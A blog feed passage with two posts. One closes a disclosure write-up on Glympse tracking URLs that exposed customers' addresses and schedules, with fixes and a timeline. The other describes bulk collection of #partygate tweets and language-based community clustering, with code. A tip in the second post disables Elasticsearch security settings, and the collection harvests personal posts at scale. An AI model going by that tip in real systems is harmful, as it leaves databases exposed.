UEJoTWMMAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Pottery Barn&quot;
        title=&quot;Pottery Barn&quot;
        src=&quot;/static/9b6e977f926b6982bedf0bb3409f3cfc/fcda8/potterybarn.png&quot;
        srcset=&quot;/static/9b6e977f926b6982bedf0bb3409f3cfc/12f09/potterybarn.png 148w,
/static/9b6e977f926b6982bedf0bb3409f3cfc/e4a3f/potterybarn.png 295w,
/static/9b6e977f926b6982bedf0bb3409f3cfc/fcda8/potterybarn.png 590w,
/static/9b6e977f926b6982bedf0bb3409f3cfc/63ec5/potterybarn.png 812w&quot;
        sizes=&quot;(max-width: 590px) 100vw, 590px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;Tru Green&lt;/h3&gt;
&lt;p&gt;Some of the URLs resolved to scheduled lawn maintenance jobs. The data which could be captured from HTTP response included addresses and the time of the scheduled work.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 590px; margin: 0 0 30px;&quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/a8c60d5a82c72a3390768278ad935313/612f7/trugreen.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 63.51351351351351%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAANCAYAAACpUE5eAAAACXBIWXMAABcRAAAXEQHKJvM/AAADJ0lEQVQ4y0WT209cVRTG51/zVWu0xktpNRHphTIz57bPdR+gLUYfTNRUY4IVlZKh1FpbBZ02SKPR1DIz0AqFopRaHEoFWmGIIw1V+nOd3QcfVvY+e+/zrW9931o57l1l57cv2Vk4T7UyxDvffkb5h0vUapOM12pUahUmr1apTU5Qlf1PlSpXJMarNRPVif/3WeSqs/2cuZTn4o+KN4YP88TgIQ72uLi2wvIUjlJ4vk2cFLFcm7ztUnAcio6ssneUi/Kzc1vOPXLvfV/nub4Z9g3M0TowS/70PP6bH+ApjzBJ8IIYP1LEWhHIGsaJfMe4QYgj4UcJSarlXO7jkNzx0d959v1pXj4xy57eGZ7/cB7r2OtEoSOPO/HDQMB8AY6wsySxR0exwKGOAh0Fi4JlC3PfJNKpMOz9rk7LiWlaP57m1b4pWk8KYM9bhP4rqNATVoF5nAFmEnR2dVG+8DVfXSxz7psRymOjnDn7hST2iRJhuNF8yOr6Pyze3WRppcnmA+jtO4ntuiS6jTAqyOP0Magf0H2sh2azyV/bW6w0/mSbf6nXF1GBa8rPbT1qMte4zs3GL8zcn2ZlZ4mPPv3EAGYZ46SdKC7KYy0G+KTdR6gvLbPeaLByb43m3w+4NjVl7gzg/OICo7UxRitjjFwe5vL1cd4+/i6uV0R3dhNpCQENonZxUbTSKbdu32GhMc+N5Rvcvb/BFWkpVwXyRgBLpRK25ROLAUmUFzMKRrdAnAwTLexSDgSv0RbuEh3b0F1H+PXWbdY21rmzusbqRoOJn6+Z1vKjiNypIQF08/JzKiakpsREHxTNUgHrohjmafGf5gX1FPuD3Rw96rC4/AdbDx+x2dxiewemZueEoScuiymlU6exHGlcHZo+CqIspFzdjictss/fzR61S9ZnyCtLEoXiaj/nh8/y+blhRsoX6B8oCfvs/+Qxw7zliE6JsPNEMy2XibgrE5LsZa96kheF3eHwgExEbMzJKnKcFiy7XXrSkYmxjSlhrMkNDg0KQyk5DgRImckw+smlFgMy0P3BS3KmTesEcWyqyfTVqciTyuiFiUQkpDT/AULnwH4wIvl/AAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Tru Green&quot;
        title=&quot;Tru Green&quot;
        src=&quot;/static/a8c60d5a82c72a3390768278ad935313/fcda8/trugreen.png&quot;
        srcset=&quot;/static/a8c60d5a82c72a3390768278ad935313/12f09/trugreen.png 148w,
/static/a8c60d5a82c72a3390768278ad935313/e4a3f/trugreen.png 295w,
/static/a8c60d5a82c72a3390768278ad935313/fcda8/trugreen.png 590w,
/static/a8c60d5a82c72a3390768278ad935313/612f7/trugreen.png 773w&quot;
        sizes=&quot;(max-width: 590px) 100vw, 590px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;Origin Energy&lt;/h3&gt;
&lt;p&gt;Times and locations of LPG pickups and exchanges were available. Customer numbers in the HTTP response could be used on the origin website to apply for delivery rescheduling. I didn’t attempt to reschedule but the cost of heating in the UK has gone up since I first came across this information at the end of 2021!&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 590px; margin: 0 0 30px;&quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/a59065ca2a3b616ce2eed883637ee0e5/e1b7c/origin.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 67.56756756756756%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAOCAYAAAAvxDzwAAAACXBIWXMAAA7CAAAOwgEVKEqAAAABTklEQVQ4y51UCY6DMAzkNf10X9FHleUKScgB4XI9KUEt3ZXKRpq6Ns7g2BOyuhFUVjUVZcm2IvhV3UQrWkmNEKS0Juc9WecYngxbY5/ojCXdmR1Zx8ld171Bg4A3pbWuKw3DQOMYKIRAy7Lsz7x3pJSMe7RSlCn+OUJKGQk9VwXfWEvjNDHhGDHxfwDEKQeEOEkWmQ9AAggBkCNmjInVwyJu+SV9378R6m8JYaetwnmeYwtQHewpwtfk1NsE+KcrxAYgVRe2HgJpMKcI0Sf4ONpxpdjpCp2zUSqQDfp3XF8RYhAp8X7PqShKqlj0QrR7zr+n3PCNkVLtcbwMPixIPwg/ha13qQC4BTHOsYgX8f9KaMx25SCFKAc8UDERfYOQsdHiLvN0LR8TvvnryHle0A/3CB+DBHwc2lbRgklugwi3G8nLhfrr9TnlLX4kfACNnTLoZSsfdAAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Origin&quot;
        title=&quot;Origin&quot;
        src=&quot;/static/a59065ca2a3b616ce2eed883637ee0e5/fcda8/origin.png&quot;
        srcset=&quot;/static/a59065ca2a3b616ce2eed883637ee0e5/12f09/origin.png 148w,
/static/a59065ca2a3b616ce2eed883637ee0e5/e4a3f/origin.png 295w,
/static/a59065ca2a3b616ce2eed883637ee0e5/fcda8/origin.png 590w,
/static/a59065ca2a3b616ce2eed883637ee0e5/efc66/origin.png 885w,
/static/a59065ca2a3b616ce2eed883637ee0e5/c83ae/origin.png 1180w,
/static/a59065ca2a3b616ce2eed883637ee0e5/e1b7c/origin.png 1449w&quot;
        sizes=&quot;(max-width: 590px) 100vw, 590px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;The Fix&lt;/h3&gt;
&lt;p&gt;I wouldn’t classify this a bug or a security flaw, per se, but these were the recommndations  I initially passed to Glympse when I privately disclosed it to them on 19th December 2021. These are also factors to consider should you be involved developing an app that is sharing information via a dynamically generated URL. &lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Consider more aggressive rate limiting and banning IP addresses which are querying multiple different trips. &lt;em&gt;Difficult when most mobile devices are behind CG-NAT.&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;If there isn’t a monitoring solution in place for the trips endpoint, consider using one. &lt;em&gt;Again, CG-NAT devices makes identifying patterns of abuse more difficult.&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;To protect future URLs increase the URL suffix complexity by increasing the length and/or including upper/lower/special characters.&lt;/li&gt;
&lt;li&gt;Consider removing personally identifiable information from the front end as well as any other superfluous data.&lt;/li&gt;
&lt;/ol&gt;
&lt;h3&gt;Disclosure&lt;/h3&gt;
&lt;p&gt;I have been in contact with the Glympse Team since December 2021 assisting them with their fix and my attack is now not possible thanks to improvements that Glympse have made! Some of you may think that the fix took a while to implement and that data was exposed for too long but I understand that Glympse has a relatively small team and I was informed by members of the C-Suite that this fix was prioritised ahead of fee earning activity.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Dec 2021 — Research conducted and private disclosure made. &lt;/li&gt;
&lt;li&gt;Jan 2022 — Well thought out initial response from Glympse. There were some other un-noteworthy minor findings in the viewer data flow including some publicly facing credentials in the browser app that were passed to the backend but these were intended to work as placeholders and  used for logging and monitoring purposes. The URL suffix complexity was described as a larger effort, primarily due to the variety of external integrations and backwards compatibility concerns. I also turned down an offer to sign an NDA as it didn’t feel quite right before a fix was in place!&lt;/li&gt;
&lt;li&gt;Feb to Mar 2022 — Further discussions about rate limiting, CG-NAT, URL complexity, eliminating superfluous data and possibly password protecting trips (a decision Glympse decided against).&lt;/li&gt;
&lt;li&gt;Apr 2022 — Gentle nudge suggesting that &amp;#x3C; 3 months to apply a fix when personal information is publicly available is a benchmark to strive for.&lt;/li&gt;
&lt;li&gt;May to Jun 2022 — Glympse became a little non-responsive but I understand this was due to engineers and C-Suite holidays.&lt;/li&gt;
&lt;li&gt;Jul 2022 — Fix complete for individual users of the Glympse application but they wanted to wait until a large portion of their users downloaded the new latest version otherwise the fix would break the application.&lt;/li&gt;
&lt;li&gt;Aug 2022 — 80% of the users were on a new version of the app and the update was pushed. App now supported the newly introduced invite code (upper case, lower case, multiple hyphens and 9 characters long). Importantly, trips are “live” for a reduced amount of time and superfluous data had been minimised which made my attack obsolete. There are also future plans to increase the length of the URL suffix in line with best practice.&lt;/li&gt;
&lt;li&gt;Aug to Nov 2022 - Further engineering work needed to be completed to ensure the same fix was pushed to all of Glympse’s enterprise partners, there was an initial plan to publish this article on National Computer Security Day (Nov 30) but unfortunately Glypse needed more time.&lt;/li&gt;
&lt;li&gt;Jan 2023 - Fixes complete!&lt;/li&gt;
&lt;li&gt;Mar 2023 - Article published!&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Side note&lt;/h3&gt;
&lt;p&gt;Another ‘lesson learned’ from this exercise is the importance of supplier due diligence and how vulnerabilities can be introduced into an organisation’s infrastructure via a supplier. Glympse are SOC 2 Type 2 certified which is one of the meatier information security accreditations. Having been employed as a consultant to assist organisations with meeting the standards and having conducted SOC 2 audits myself, it goes to show that even the most thorough best practice is fallible. An accreditation can be demonstrative of &lt;em&gt;good&lt;/em&gt; practice (often at a point-in-time) but always strive to go above and beyond and consider vulnerabilities and security gaps that aren’t addressed by the frameworks you have adopted.&lt;/p&gt;
&lt;h3&gt;Kind Words&lt;/h3&gt;
&lt;p&gt;“Too many people in our industry use their research for their own personal gains,” said Brandon Rodgers, Senior Technical Architect, at Glympse. “We appreciate how thoughtful Dan was working with us to develop a solution that improves our platform for our customers.”&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Twitter users mentioning #partygate divided into communities based on language style]]></title><description><![CDATA[Background This is an implementation of the paper, “Message-based Community Detection on Twitter”, written by Carl Miller and associates at…]]></description><link>https://dfworks.com/blog/partygate/</link><guid isPermaLink="false">https://dfworks.com/blog/partygate/</guid><pubDate>Sun, 05 Jun 2022 12:00:00 GMT</pubDate><content:encoded>&lt;h2&gt;Background&lt;/h2&gt;
&lt;p&gt;This is an implementation of the &lt;a href=&quot;https://files.casmtechnology.com/message-based-community-detection-on-twitter.pdf&quot;&gt;paper&lt;/a&gt;, “Message-based Community Detection on Twitter”, written by Carl Miller and associates at &lt;a href=&quot;https://www.casmtechnology.com/&quot;&gt;CASM Technology.&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Partygate is a political scandal in the United Kingdom concerning gatherings that were attended by government and Conservative Party staff during 2020 and 2021 where COVID-19 public health restrictions prohibited most social gatherings. These gatherings sat outside of the restrictions.&lt;/p&gt;
&lt;p&gt;Understandably this was a divisive issue and covered at length by the UK media. &lt;a href=&quot;https://yougov.co.uk/topics/politics/articles-reports/2021/12/08/vast-majority-britons-think-downing-street-party-d&quot;&gt;Opinion Polling&lt;/a&gt; suggests that partygate was an important factor in declining rates of public support for the Prime Minister, Boris Johnson, as well as for the Conservative Party more broadly.&lt;/p&gt;
&lt;p&gt;Using Twitter’s Search and Stream API it was possible to collect a sizable database of tweets using the hashtag #partygate as well as the subsequent engagement. By analysing this data, we can better understand the nature of the accounts that were engaging with this hashtag, highlight any automated ‘bot’ or inauthentic activity and identify communities with similar thoughts and interpretations of the scandal.&lt;/p&gt;
&lt;p&gt;Traditional network analysis would link entities based on follower activity and other engagement. This implementation links accounts based on the language each author uses leveraging state-of-the-art natural language models capable of creating mathematical representations of text. These linguistic representations can spatially express similarities between accounts allowing for the identification of communities which can then be characterised through a combination of quantitative and qualitative means. Traditional network analysis uses engagement to create edges between accounts and is a reflection of popularity on Twitter where communities form around influential accounts. Communities based on language are more likely to be inclusive of less popular accounts which is important when trying to understand issues such as politics or elections. &lt;/p&gt;
&lt;h2&gt;Data Collection&lt;/h2&gt;
&lt;p&gt;&lt;a href=&quot;https://github.com/medialab/gazouilloire&quot;&gt;Gazouilloire&lt;/a&gt; is a command line tool for long-term tweet collection from Twitter’s Stream and Search APIs allowing for large datasets to be created. By running a local &lt;a href=&quot;https://www.elastic.co/downloads/elasticsearch#ga-release&quot;&gt;Elastic&lt;/a&gt; server Gazouilloire will start to build a database of tweets given specific keywords or search terms (&lt;a href=&quot;https://www.elastic.co/guide/en/elasticsearch/reference/current/query-dsl-query-string-query.html#query-string-syntax&quot;&gt;lucene query syntax&lt;/a&gt; can be used for more complex queries).&lt;/p&gt;
&lt;p&gt;Installation instructions can be found on the &lt;a href=&quot;https://github.com/medialab/gazouilloire&quot;&gt;Github&lt;/a&gt; page, you just need to make sure that you have ElasticSearch installed and a working set of &lt;a href=&quot;https://apps.twitter.com/app/&quot;&gt;Twitter API keys&lt;/a&gt; (the Twitter developer account needs to have elevated access for Gazouilloire to work). &lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Tip&lt;/strong&gt;: I was initially struggling with getting Gazouilloire to connect to Elastic, if you are experiencing similar problems it is probably to do with Elastic’s security settings. Gazouilloire works over HTTP by default while Elastic won’t accept a non-HTTPS post. Whilst not optimal from a security perspective; setting the xpack.security.whatever variables to False in your elastic.yaml file will fix this.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Once installed you can use &lt;code class=&quot;language-text&quot;&gt;gazou init&lt;/code&gt; to instantiate a project where a config.json file is created for your amendments. Editing the file to include your Twitter credentials, Elastic database details and keywords is all that is required before beginning to collect your data. I also changed the &lt;code class=&quot;language-text&quot;&gt;grab_conversations&lt;/code&gt; variable to &lt;code class=&quot;language-text&quot;&gt;True&lt;/code&gt; so that recursive retrieval of all tweets that engaged with the hashtag were also collected.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;{
    &amp;quot;twitter&amp;quot;: {
        &amp;quot;key&amp;quot;: &amp;quot;xxxxxxxxxx&amp;quot;,
        &amp;quot;secret&amp;quot;: &amp;quot;xxxxxxxxxxxxxx&amp;quot;,
        &amp;quot;oauth_token&amp;quot;: &amp;quot;xxxxxxxxxxxxxx&amp;quot;,
        &amp;quot;oauth_secret&amp;quot;: &amp;quot;xxxxxxxxxxxxx&amp;quot;
    },
    &amp;quot;database&amp;quot;: {
        &amp;quot;host&amp;quot;: &amp;quot;localhost&amp;quot;,
        &amp;quot;port&amp;quot;: 9200,
        &amp;quot;db_name&amp;quot;: &amp;quot;partygate_full&amp;quot;,
        &amp;quot;multi_index&amp;quot;: false,
        &amp;quot;nb_past_months&amp;quot;: 0
    },
    &amp;quot;keywords&amp;quot;: [
        &amp;quot;#partygate&amp;quot;
    ],

    &amp;quot;url_pieces&amp;quot;: [],
    &amp;quot;time_limited_keywords&amp;quot;: {},
    &amp;quot;language&amp;quot;: null,
    &amp;quot;geolocation&amp;quot;: &amp;quot;&amp;quot;,
    &amp;quot;resolve_redirected_links&amp;quot;: true,
    &amp;quot;resolving_delay&amp;quot;: 30,
    &amp;quot;grab_conversations&amp;quot;: true,
    &amp;quot;catchup_past_week&amp;quot;: true,
    &amp;quot;download_media&amp;quot;: {
        &amp;quot;photos&amp;quot;: false,
        &amp;quot;videos&amp;quot;: false,
        &amp;quot;animated_gifs&amp;quot;: false,
        &amp;quot;media_directory&amp;quot;: &amp;quot;media&amp;quot;
    },
    &amp;quot;timezone&amp;quot;: &amp;quot;Europe/Paris&amp;quot;,
    &amp;quot;verbose&amp;quot;: false
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Over the course of a day ~350k tweets were retrieved that mentioned, retweeted or engaged with a #partygate tweet from 102,000 individual accounts. &lt;/p&gt;
&lt;p&gt;The python library &lt;a href=&quot;https://eland.readthedocs.io/en/v8.1.0/&quot;&gt;eland&lt;/a&gt; is an Elastic client which was used to retrieve the list of unique users from the database&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;import eland as ed

ed_ecommerce = ed.DataFrame(&amp;#39;http://localhost:9200&amp;#39;, &amp;#39;partygate_tweets&amp;#39;)
usernames = ed_ecommerce[&amp;#39;user_screen_name&amp;#39;].unique()&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;In order to map accounts on the basis of similarities in the textual content of their tweets it was important to analyse all of the account activity, not only when tweets referring to partygate were posted. Collecting the most recent 200 tweets from the timeline of the 102,000 distinct users resulted in a dataset of approximately 20,400,000 tweets.&lt;/p&gt;
&lt;p&gt;Collection of the most recent 200 tweets from each users timeline was achieved by passing each username to the below function. A csv file was saved for each account. You will need to put in your own Twitter credentials and also &lt;code class=&quot;language-text&quot;&gt;import csv&lt;/code&gt; and &lt;code class=&quot;language-text&quot;&gt;import tweepy&lt;/code&gt;&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;def get_all_tweets(screen_name):
    
    #authorize twitter, initialize tweepy
    auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
    auth.set_access_token(access_key, access_secret)
    api = tweepy.API(auth, wait_on_rate_limit=True)
    
    #initialize a list to hold all the tweepy tweets
    alltweets = []  
    
    #make initial request for most recent tweets (200 is the maximum allowed count)
    new_tweets = api.user_timeline(screen_name = screen_name,count=200)
    
    #transform the tweepy tweets into a 2D array that will populate the csv 
    outtweets = [[tweet.id_str, tweet.created_at, tweet.text] for tweet in new_tweets]
    
    #write the csv  
    with open(f&amp;#39;new_{screen_name}_tweets.csv&amp;#39;, &amp;#39;w&amp;#39;, encoding=&amp;quot;utf-8&amp;quot;) as f:
        writer = csv.writer(f)
        writer.writerow([&amp;quot;id&amp;quot;,&amp;quot;created_at&amp;quot;,&amp;quot;text&amp;quot;])
        writer.writerows(outtweets)&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;To have a more manageable dataset it was important to focus on the accounts which most intensively engaged with #partygate. Each of the ~102,000 accounts which had only mentioned or interacted with #partygate twice or less were removed resulting in a dataset of 1,226,500 tweets authored by 4,906 users.&lt;/p&gt;
&lt;h2&gt;Account Representation&lt;/h2&gt;
&lt;p&gt;As discussed, instead of a more traditional network map that groups accounts based on friend-follower relationships, we are instead mapping relationships based on the similarity of language used in the tweets that were posted or amplified. By retrieving the last 200 tweets from each account (not only those tweets mentioning #partygate) we can identify communities of accounts defined by common linguistic attributes. To do this, tweets are first mapped to a vector space using a pre-trained sentence encoder, in this case &lt;a href=&quot;https://huggingface.co/sentence-transformers/all-distilroberta-v1&quot;&gt;all-distilroberta-v1&lt;/a&gt;.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Future work&lt;/strong&gt;: Arguably the most recent 200 tweets aren’t reflective of a complete activity timeline. The dataset could be enriched by incorporating a vector representation of the bio, geotagging information or use of object identification on the profile image. &lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;For each account the transformer was leveraged to map each tweet into a 768-dimensional space and then an average was taken to get an account level representation. Given the number of calculations that were required, this part of the process was shortened by using cloud GPU servers with more memory than I had available on my laptop. I used a &lt;a href=&quot;https://www.paperspace.com/&quot;&gt;paperspace&lt;/a&gt; GPU+ instance which had 30GB RAM and a Quadro M4000 GPU.&lt;/p&gt;
&lt;p&gt;The csv files which were created in the “Data Collection” phase above were placed into a “triaged&lt;em&gt;csv” folder and the below code was ran to get the account representation vectors (saved in the account&lt;/em&gt;representations.csv file). &lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;from tqdm import tqdm
import os
import pandas as pd
from sentence_transformers import SentenceTransformer
import re
import string
import numpy as np

directory = &amp;#39;triaged_csvs&amp;#39;
model = SentenceTransformer(&amp;#39;sentence-transformers/all-distilroberta-v1&amp;#39;)
user_account_representations = []

def remove_punct(text):
    text  = &amp;quot;&amp;quot;.join([char for char in text if char not in string.punctuation])
    text = re.sub(&amp;#39;[0-9]+&amp;#39;, &amp;#39;&amp;#39;, text)
    return text

for filename in tqdm(os.listdir(directory)):
    #print(filename)
    tempstring = filename.split(&amp;#39;_tweets.csv&amp;#39;)[0]
    username = tempstring.split(&amp;#39;new_&amp;#39;)[1]
    temp_df = pd.read_csv(&amp;#39;triaged_csvs/&amp;#39; + filename)
    temp_df[&amp;#39;clean_text&amp;#39;] = temp_df[&amp;#39;text&amp;#39;].apply(lambda x: remove_punct(x))
    user_account_representations.append([username, np.array([model.encode(tweet) for tweet in temp_df[&amp;#39;clean_text&amp;#39;]]).mean(axis=0)])

df = pd.DataFrame(user_account_representations)
df.to_csv(&amp;#39;account_representations.csv&amp;#39;)&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h2&gt;Account Network Construction&lt;/h2&gt;
&lt;p&gt;To construct a network diagram where each node is a Twitter account and weighted edges represent the similarity between two accounts, it was necessary to calculate the cosine similarity. Specifically, the weight of an edge between two accounts is the cosine similarity of the account-level representations (averaged message vectors) of the two accounts. This was also a computationally intensive step which benefitted from cloud computing. Given a pairwise calculation needed to be done across every account vector (an array of length 768), the below script took over 20 hours to complete.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;import pandas as pd
import numpy as np
from numpy import dot
from numpy.linalg import norm
from tqdm import tqdm
import itertools
from numpy import dot
from numpy.linalg import norm

df = pd.read_csv(&amp;#39;account_representations.csv&amp;#39;)
df = df.dropna()

df.columns = [&amp;#39;index&amp;#39;, &amp;#39;username&amp;#39;, &amp;#39;vector&amp;#39;]

def vectoriser(weird):
        one = weird.replace(&amp;#39;[&amp;#39;, &amp;#39;&amp;#39;)
        two = one.replace(&amp;#39;]&amp;#39;, &amp;#39;&amp;#39;)
        less_weird = np.fromstring(two, dtype=float, sep=&amp;#39; &amp;#39;)
        return less_weird

df[&amp;#39;new&amp;#39;] = df[&amp;#39;vector&amp;#39;].apply(lambda x: vectoriser(x))
df.drop(&amp;#39;index&amp;#39;, axis=1, inplace=True)
df.drop(&amp;#39;vector&amp;#39;, axis=1, inplace=True)
data = []

for tup in tqdm(list(itertools.combinations(df[&amp;#39;username&amp;#39;].tolist(), 2))):
        x = df.loc[df.username == tup[0], &amp;#39;new&amp;#39;].to_numpy()
        y = df.loc[df.username == tup[1], &amp;#39;new&amp;#39;].to_numpy()
        result = dot(x[0], y[0])/(norm(x[0])*norm(y[0]))
        data.append([tup[0], tup[1], result])

df_final = pd.DataFrame(data)
df_final.to_csv(&amp;#39;mappings.csv&amp;#39;)&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Displaying every edge in the chart would almost certainly be an indecipherable blob given that there would be 10’s of millions of edges so the dataset was reduced by setting a threshold to preserve the relationships between only the most similar nodes. Using only the most highly weighted 250,000 edges, 247 of the accounts were excluded from the network on the grounds that they were not sufficiently similar to any other account.&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;https://github.com/gephi/gephi&quot;&gt;Gephi&lt;/a&gt; was used to graph the network. For positioning nodes, the &lt;a href=&quot;https://journals.plos.org/plosone/article?id=10.1371/journal.pone.0098679#:~:text=ForceAtlas2%20is%20a%20force%2Ddirected,local%20and%20global%20adaptive%20temperatures.&quot;&gt;ForceAtlas2&lt;/a&gt; layout algorithm was applied which is a widely used approach to spatialise a weighted, undirected network in two dimensions. For community detection, Gephi uses the Louvain method, a modularity based algorithm, which assigns a single community to each node. Approximately 99% of accounts were assigned to one of 3 communities.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 590px; margin: 0 0 30px;&quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/763fab8549088478e0e6724a085ffb23/efcb3/cropped.jpg&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 83.1081081081081%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/jpeg;base64,/9j/2wBDABALDA4MChAODQ4SERATGCgaGBYWGDEjJR0oOjM9PDkzODdASFxOQERXRTc4UG1RV19iZ2hnPk1xeXBkeFxlZ2P/2wBDARESEhgVGC8aGi9jQjhCY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2P/wgARCAARABQDASIAAhEBAxEB/8QAGAABAAMBAAAAAAAAAAAAAAAAAAEDBAX/xAAVAQEBAAAAAAAAAAAAAAAAAAAAAv/aAAwDAQACEAMQAAAB7me+hOsKkAH/xAAaEAEAAwADAAAAAAAAAAAAAAACAQMRABIg/9oACAEBAAEFAkoMG7VxjtBqxeP/xAAWEQADAAAAAAAAAAAAAAAAAAARICH/2gAIAQMBAT8BpT//xAAWEQEBAQAAAAAAAAAAAAAAAAARASD/2gAIAQIBAT8BGY//xAAXEAEAAwAAAAAAAAAAAAAAAAARAAEw/9oACAEBAAY/Am4GH//EABkQAQADAQEAAAAAAAAAAAAAAAEAESEQIP/aAAgBAQABPyGaHPEeBVK5XDz/AP/aAAwDAQACAAMAAAAQm8AA/8QAFxEBAAMAAAAAAAAAAAAAAAAAASAhMf/aAAgBAwEBPxAHfIf/xAAWEQEBAQAAAAAAAAAAAAAAAAABESD/2gAIAQIBAT8QTQY4/8QAHBABAAEEAwAAAAAAAAAAAAAAAREAECFBIDFR/9oACAEBAAE/EEK40HbSPC4Gclp3YdPlMJOUjbx//9k=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Chart&quot;
        title=&quot;Chart&quot;
        src=&quot;/static/763fab8549088478e0e6724a085ffb23/1c72d/cropped.jpg&quot;
        srcset=&quot;/static/763fab8549088478e0e6724a085ffb23/a80bd/cropped.jpg 148w,
/static/763fab8549088478e0e6724a085ffb23/1c91a/cropped.jpg 295w,
/static/763fab8549088478e0e6724a085ffb23/1c72d/cropped.jpg 590w,
/static/763fab8549088478e0e6724a085ffb23/a8a14/cropped.jpg 885w,
/static/763fab8549088478e0e6724a085ffb23/fbd2c/cropped.jpg 1180w,
/static/763fab8549088478e0e6724a085ffb23/efcb3/cropped.jpg 1545w&quot;
        sizes=&quot;(max-width: 590px) 100vw, 590px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;h2&gt;Community Characterisation&lt;/h2&gt;
&lt;p&gt;The next step in the process was to manually inspect accounts from each community to attempt to identify the attributes they had in common (Blue, Green and Pink). To manually characterise each community in this way, accounts were randomly selected from the core of each community (the core of a community was considered to be the dense region around the community’s ‘centre’), as suggested by the network’s spatial disposition. Between 50 - 150 messages from each account’s timeline were read to create a narrative summary of the content that the account had either originally authored or amplified.&lt;/p&gt;
&lt;p&gt;Features analysed included:&lt;/p&gt;
&lt;ul&gt;
